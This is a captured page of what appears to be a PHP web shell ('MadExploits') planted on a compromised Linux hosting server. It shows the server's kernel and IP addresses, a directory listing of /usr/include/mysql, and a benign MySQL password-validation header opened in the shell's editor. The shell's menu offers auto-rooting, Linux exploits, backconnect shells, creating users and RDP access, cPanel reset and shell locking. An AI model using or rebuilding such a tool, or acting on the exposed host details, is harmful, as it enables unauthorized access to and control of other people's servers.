Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.188.223.120
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
include /
mysql /
[ HOME SHELL ]
Name
Size
Permission
Action
mysql
[ DIR ]
drwxr-xr-x
big_endian.h
3.96
KB
-rw-r--r--
binary_log_types.h
2.59
KB
-rw-r--r--
byte_order_generic.h
2.89
KB
-rw-r--r--
byte_order_generic_x86.h
2.81
KB
-rw-r--r--
decimal.h
5.45
KB
-rw-r--r--
errmsg.h
4.73
KB
-rw-r--r--
keycache.h
7.71
KB
-rw-r--r--
little_endian.h
3.82
KB
-rw-r--r--
m_ctype.h
33.87
KB
-rw-r--r--
m_string.h
10.89
KB
-rw-r--r--
my_alloc.h
2.92
KB
-rw-r--r--
my_byteorder.h
6.03
KB
-rw-r--r--
my_command.h
2.27
KB
-rw-r--r--
my_compiler.h
5.68
KB
-rw-r--r--
my_config.h
919
B
-rw-r--r--
my_config_x86_64.h
12.17
KB
-rw-r--r--
my_dbug.h
9.75
KB
-rw-r--r--
my_dir.h
3.33
KB
-rw-r--r--
my_getopt.h
6.7
KB
-rw-r--r--
my_global.h
22.75
KB
-rw-r--r--
my_list.h
2.14
KB
-rw-r--r--
my_sys.h
39.14
KB
-rw-r--r--
my_thread.h
5.16
KB
-rw-r--r--
my_thread_local.h
2.9
KB
-rw-r--r--
my_xml.h
3.15
KB
-rw-r--r--
mysql.h
29.19
KB
-rw-r--r--
mysql_com.h
24.99
KB
-rw-r--r--
mysql_com_server.h
1.85
KB
-rw-r--r--
mysql_embed.h
1.51
KB
-rw-r--r--
mysql_time.h
2.77
KB
-rw-r--r--
mysql_version.h
1023
B
-rw-r--r--
mysqld_ername.h
122.67
KB
-rw-r--r--
mysqld_error.h
44.6
KB
-rw-r--r--
mysqlx_ername.h
3.63
KB
-rw-r--r--
mysqlx_error.h
3.11
KB
-rw-r--r--
mysqlx_version.h
1.77
KB
-rw-r--r--
plugin.h
26.08
KB
-rw-r--r--
plugin_audit.h
17.52
KB
-rw-r--r--
plugin_ftparser.h
7.86
KB
-rw-r--r--
plugin_group_replication.h
5.93
KB
-rw-r--r--
plugin_keyring.h
6.54
KB
-rw-r--r--
plugin_validate_password.h
1.94
KB
-rw-r--r--
sql_common.h
8
KB
-rw-r--r--
sql_state.h
14.72
KB
-rw-r--r--
sslopt-case.h
2.43
KB
-rw-r--r--
sslopt-longopts.h
3.13
KB
-rw-r--r--
sslopt-vars.h
3.23
KB
-rw-r--r--
thr_cond.h
5.42
KB
-rw-r--r--
thr_mutex.h
5.92
KB
-rw-r--r--
thr_rwlock.h
6.28
KB
-rw-r--r--
typelib.h
2.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : plugin_validate_password.h
/* Copyright (c) 2012, 2023, Oracle and/or its affiliates. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License, version 2.0, as published by the Free Software Foundation. This program is also distributed with certain software (including but not limited to OpenSSL) that is licensed under separate terms, as designated in a particular file or component or in included license documentation. The authors of MySQL hereby grant you an additional permission to link the program and your derivative works with the separately licensed software that they have included with MySQL. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License, version 2.0, for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ #ifndef MYSQL_PLUGIN_VALIDATE_PASSWORD_INCLUDED #define MYSQL_PLUGIN_VALIDATE_PASSWORD_INCLUDED /* API for validate_password plugin. (MYSQL_VALIDATE_PASSWORD_PLUGIN) */ #include <mysql/plugin.h> #define MYSQL_VALIDATE_PASSWORD_INTERFACE_VERSION 0x0100 /* The descriptor structure for the plugin, that is referred from st_mysql_plugin. */ typedef void* mysql_string_handle; struct st_mysql_validate_password { int interface_version; /* This function retuns TRUE for passwords which satisfy the password policy (as choosen by plugin variable) and FALSE for all other password */ int (*validate_password)(mysql_string_handle password); /* This function returns the password strength (0-100) depending upon the policies */ int (*get_password_strength)(mysql_string_handle password); }; #endif
Close